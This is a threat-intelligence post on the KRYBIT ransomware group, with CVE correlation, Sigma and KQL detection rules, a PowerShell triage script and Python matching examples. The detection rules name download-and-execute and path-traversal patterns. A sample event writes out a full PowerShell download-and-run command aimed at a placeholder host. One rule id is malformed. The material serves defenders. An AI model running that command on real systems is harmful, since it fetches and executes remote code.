KRYBIT Ransomware Gang: 11 New Victims Posted — Perimeter Breach Analysis & Detection Rules

Security Arsenal Team
July 3, 2026

Aliases & Classification: KRYBIT appears to operate as a Ransomware-as-a-Service (RaaS) entity, given the rapid cadence of victim postings (11 in 3 days) and the diverse geographic footprint spanning North America, Europe, Asia, and the Middle East.

Operational Model: They use a double-extortion model, exfiltrating sensitive data before encryption to increase pressure on victims. The group typically demands mid-range to high ransoms, calibrated to victim revenue and the criticality of the exfiltrated data (intellectual property for tech firms, operational data for logistics).

Initial Access Vectors: Intelligence indicates KRYBIT aggressively exploits internet-facing infrastructure. Recent activity correlates strongly with CISA KEV-listed vulnerabilities, specifically targeting VPN gateways (Check Point), remote management tools (ConnectWise ScreenConnect), and firewall management interfaces (Cisco FMC). They also leverage phishing with macro-laden documents as a secondary vector.

Dwell Time: Observations suggest a dwell time of approximately 3–7 days. The group moves quickly from initial access to lateral movement, often staging data immediately after establishing a foothold to minimize detection by EDR solutions.

Current Campaign Analysis

Sector Targeting: The current campaign (July 2026) shows a distinct pivot towards the Technology sector (4 victims) and Transportation/Logistics (2 victims). Secondary targets include Agriculture and Healthcare. This targeting suggests KRYBIT is actively hunting for high-value intellectual property (Tech) and time-sensitive operational data (Logistics) to maximize extortion leverage.

Geographic Spread: The operation is highly globalized, impacting:

  • Americas: US, MX, CA
  • Europe: ES, IT
  • Asia: TW, MY
  • Middle East: ME

Victim Profile: Based on the victim roster (e.g., majuhome.com.my, gsp.es, TRANSPORTES Y LOGISTICA BRAS), KRYBIT targets mid-to-large enterprises. These are likely organizations with $50M - $500M in revenue—large enough to pay significant ransoms but often lacking the mature 24/7 SOC capabilities of Fortune 100 firms.

Posting Frequency: The gang posted 2 victims on 2026-07-03 and 9 victims on 2026-07-01. This high velocity indicates an automated or highly efficient attack pipeline.

CVE Correlation: There is a high probability that the recent victims were compromised via the following CVEs currently listed in CISA's Known Exploited Vulnerabilities catalog:

  • CVE-2026-50751 (Check Point Security Gateway): Likely used for initial network perimeter bypass.
  • CVE-2024-1708 (ConnectWise ScreenConnect): A common vector for gaining remote code execution on internal systems.
  • CVE-2026-20131 (Cisco Secure Firewall FMC): Exploited to bypass or disable security controls during lateral movement.

Detection Engineering

Sigma Rules

YAML
---
title: Potential Check Point IKEv1 Exploitation (CVE-2026-50751)
id: 3a9b1c8d-5e6f-4a2b-9c1d-8e7f6a5b4c3d
description: Detects signs of exploitation targeting the Check Point Security Gateway IKEv1 improper authentication vulnerability.
status: experimental
author: Security Arsenal
date: 2026/07/03
logsource:
  product: firewall
  service: check_point
detection:
  selection:
    product: 'VPN'
    action|contains: 'key_exchange'
    ike_version: '1'
    auth_method|contains: 'aggressive'
  condition: selection
falsepositives:
  - Legitimate IKEv1 VPN configuration from legacy clients
level: high
---
title: ConnectWise ScreenConnect Path Traversal Exploit (CVE-2024-1708)
id: b4c3d2e1-6f7a-4b5c-8d9e-0f1a2b3c4d5e
description: Detects path traversal attempts against the ConnectWise ScreenConnect web server.
status: experimental
author: Security Arsenal
date: 2026/07/03
logsource:
  category: web
detection:
  selection:
    cs-uri-stem|endswith: '/Setup.aspx'
    cs-uri-query|contains:
      - '..%2f'
      - '..\\'
  condition: selection
falsepositives:
  - Rare; legitimate traffic should not use path traversal on Setup.aspx
level: critical
---
title: Suspicious PowerShell Process via ScreenConnect (KRYBIT TTP)
id: c5d4e3f2-7g8b-5c6d-9e0f-1g2h3i4j5k6l
description: Detects PowerShell execution spawned by the ConnectWise ScreenConnect client, a common lateral movement technique for ransomware gangs.
status: experimental
author: Security Arsenal
date: 2026/07/03
logsource:
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\ScreenConnect.ClientService.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'DownloadString'
      - 'IEX'
      - 'EncryptedData'
  condition: selection
falsepositives:
  - Administrative troubleshooting via ScreenConnect
level: high
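
The selection logic of the rules above, as an added example (not code from the post or from the Sigma project): a minimal matcher implementing the Sigma semantics these rules rely on, run over constructed process-creation events against the ScreenConnect rule. Map keys are ANDed, list values are ORed, and the `endswith`/`contains` modifiers are applied case-insensitively; the event field names mirror the rule, and the sample paths and command lines are constructed.

```python
"""Mini Sigma selection matcher (added example, not code from the post):
map keys are ANDed, list values are ORed, and endswith/contains are applied
case-insensitively, as Sigma backends do for Windows paths and command lines."""
from typing import Any

# Selection block of the ScreenConnect -> PowerShell rule above.
SCREENCONNECT_PS_SELECTION = {
    "ParentImage|endswith": "\\ScreenConnect.ClientService.exe",
    "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
    "CommandLine|contains": ["DownloadString", "IEX", "EncryptedData"],
}

def _field_matches(value: Any, modifier: str, patterns: list) -> bool:
    """One field against its pattern list: any matching pattern is enough (OR)."""
    if value is None:  # a missing field never matches
        return False
    v = str(value).lower()
    for p in (str(p).lower() for p in patterns):
        if (modifier == "endswith" and v.endswith(p)
                or modifier == "startswith" and v.startswith(p)
                or modifier == "contains" and p in v
                or modifier == "" and v == p):
            return True
    return False

def selection_matches(selection: dict, event: dict) -> bool:
    """Every field in the selection map must match (AND)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not _field_matches(event.get(field), modifier, patterns):
            return False
    return True

# Constructed process-creation events (not real telemetry).
SC = r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"
EVENTS = [
    {"ParentImage": SC, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"ParentImage": SC, "Image": r"C:\Windows\System32\cmd.exe",  # child is not PowerShell
     "CommandLine": "cmd /c ipconfig /all"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # parent is not ScreenConnect
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "CommandLine": "pwsh -c iex (gc s.ps1)"},
]

def matching_indices(selection: dict = SCREENCONNECT_PS_SELECTION, events: list = EVENTS) -> list:
    """Indices of events that trigger the selection."""
    return [i for i, e in enumerate(events) if selection_matches(selection, e)]
```

Only the first event fires; the second fails the child-image check and the third the parent-image check, which is the AND-across-fields behaviour that keeps this rule from alerting on every PowerShell launch.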

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// KRYBIT Lateral Movement Hunt: Detecting unusual SMB/WMI activity
// Hunt for remote execution via WMI or SMB which often precedes encryption
DeviceProcessEvents
| where Timestamp > ago(3d)
| where InitiatingProcessFileName in ("wmiprvse.exe", "svchost.exe")
| where FileName in ("powershell.exe", "cmd.exe", "rundll32.exe")
| where ProcessCommandLine has "-enc" or ProcessCommandLine has "Invoke-"
| extend HostName = DeviceName, Account = InitiatingProcessAccountName
| project Timestamp, HostName, Account, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

PowerShell Response Script

PowerShell
# KRYBIT Rapid Response: Persistence and Shadow Copy Check
# Run this on suspicious endpoints to identify common ransomware precursors.
# Requires an elevated session (scheduled task details, VSS and connection owners).

Write-Host "[+] Checking for Scheduled Tasks created in last 48 hours..." -ForegroundColor Cyan
# The task Date property is a string (and may be empty); cast it before comparing.
$cutoff = (Get-Date).AddHours(-48)
Get-ScheduledTask | Where-Object { $_.Date -and ([datetime]$_.Date) -gt $cutoff } |
    Select-Object TaskName, Author, Date,
        @{ Name = 'Action'; Expression = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' } } |
    Format-Table -AutoSize

Write-Host "[+] Checking Volume Shadow Copy Service (VSS) Status..." -ForegroundColor Cyan
# Ransomware groups like KRYBIT often delete shadows prior to encryption.
# Get-CimInstance returns InstallDate as a DateTime, so the sort is chronological.
$vss = @(Get-CimInstance -ClassName Win32_ShadowCopy | Sort-Object InstallDate -Descending | Select-Object -First 5)
if ($vss.Count -eq 0) {
    Write-Host "[WARNING] No recent Volume Shadow Copies found. Possible deletion." -ForegroundColor Red
} else {
    $vss | Format-Table DeviceObject, InstallDate, VolumeName -AutoSize
}

Write-Host "[+] Checking for large outbound network connections (Data Exfil)..." -ForegroundColor Cyan
# Simple check for active ESTABLISHED connections to non-standard remote ports.
# Filter on RemotePort (the local port of an outbound connection is ephemeral) and
# exclude loopback and RFC 1918 destinations so only internet-bound sessions remain.
Get-NetTCPConnection -State Established |
    Where-Object {
        $_.RemotePort -notin 80, 443 -and
        $_.RemoteAddress -notmatch '^(127\.|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)'
    } |
    Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess,
        @{ Name = 'Process'; Expression = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName } } |
    Format-Table -AutoSize

Incident Response Priorities

T-Minus Detection Checklist:

  • VPN Logs: Immediately audit logs for Check Point gateways (CVE-2026-50751). Look for successful authentications followed by unusual RDP traffic from the same source IP.
  • RMM Sessions: Audit ConnectWise ScreenConnect logs for logins outside of business hours or from impossible travel locations.
  • Firewall Config Changes: Check Cisco FMC logs for unauthorized configuration changes or rule modifications (CVE-2026-20131).
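
The first checklist item as detection logic over constructed log records, added here as an example (not code from the post): a successful VPN authentication is paired with any RDP (TCP/3389) connection from the same client address within a window afterwards. Field names are assumed rather than taken from the Check Point log schema, and which address the gateway logs for the client (public or tunnel-assigned) is an assumption to confirm against your own logs.

```python
"""VPN login followed by RDP from the same source (added example, not code
from the post). A successful Check Point VPN authentication is paired with
any RDP (TCP/3389) connection from the same client address inside a window.
Field names are assumed, not the vendor's log schema."""
from datetime import datetime, timedelta

# Constructed sample records (not real logs); timestamps are UTC ISO 8601.
VPN_AUTH = [
    {"time": "2026-07-01T02:14:07", "src": "203.0.113.45", "user": "jsmith", "result": "success"},
    {"time": "2026-07-01T09:30:12", "src": "198.51.100.7", "user": "akumar", "result": "success"},
    {"time": "2026-07-01T02:20:00", "src": "203.0.113.99", "user": "ops", "result": "failure"},
]
RDP_CONN = [
    {"time": "2026-07-01T02:21:40", "src": "203.0.113.45", "dst": "10.0.5.10", "dport": 3389},
    {"time": "2026-07-01T13:05:00", "src": "198.51.100.7", "dst": "10.0.5.11", "dport": 3389},
    {"time": "2026-07-01T02:25:00", "src": "203.0.113.99", "dst": "10.0.5.12", "dport": 3389},
]

def correlate_vpn_then_rdp(vpn: list, rdp: list, window: timedelta = timedelta(hours=1)) -> list:
    """Return (vpn_record, rdp_record) pairs where a successful VPN login is
    followed within `window` by an RDP connection from the same source address."""
    # Index RDP connections by source so each login is a lookup, not a full scan.
    by_src: dict = {}
    for r in rdp:
        if r["dport"] == 3389:
            by_src.setdefault(r["src"], []).append(r)
    hits = []
    for v in vpn:
        if v["result"] != "success":  # failed logins are not the pattern here
            continue
        t0 = datetime.fromisoformat(v["time"])
        for r in by_src.get(v["src"], []):
            delta = datetime.fromisoformat(r["time"]) - t0
            if timedelta(0) <= delta <= window:  # RDP must come after the login
                hits.append((v, r))
    return hits

def summarize(hits: list) -> list:
    """Analyst-friendly lines, one per correlated pair."""
    return [f"{v['src']} user={v['user']} vpn={v['time']} rdp->{r['dst']} at {r['time']}"
            for v, r in hits]
```

With the one-hour default only the jsmith login is flagged; widening the window to four hours also pairs the akumar login with its later RDP session, which is the knob to tune against your normal remote-work traffic.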

Critical Assets for Exfiltration:

  • Tech Sector: Source code repositories, customer databases, SSH keys, and intellectual property.
  • Transportation/Logistics: Shipping manifests, logistics databases, supplier contracts, and operational schedules.

Containment Actions:

  1. Isolate: Disconnect VPN concentrators from the internal network if exploitation is suspected, but keep them running for forensic acquisition.
  2. Reset: Force a password reset for all privileged accounts and disable local admin accounts on servers.
  3. Block: Block IP addresses associated with the initial VPN/ScreenConnect access at the perimeter firewall.

Hardening Recommendations

Immediate (24h):

  • Patch Critical CVEs: Apply patches for CVE-2026-50751 (Check Point), CVE-2024-1708 (ConnectWise), and CVE-2026-20131 (Cisco FMC) immediately. If patching is not possible, apply vendor-provided mitigations (e.g., disabling IKEv1, restricting access to /Setup.aspx).
  • MFA Enforcement: Enforce Multi-Factor Authentication (MFA) on all VPN and RMM access points.

Short-term (2 weeks):

  • Network Segmentation: Implement strict segmentation so that VPN and RMM access cannot reach Domain Controllers and critical backup servers directly.
  • Zero Trust for RMM: Implement a "Just-In-Time" access model for remote management tools, ensuring sessions are approved and recorded before initiation.
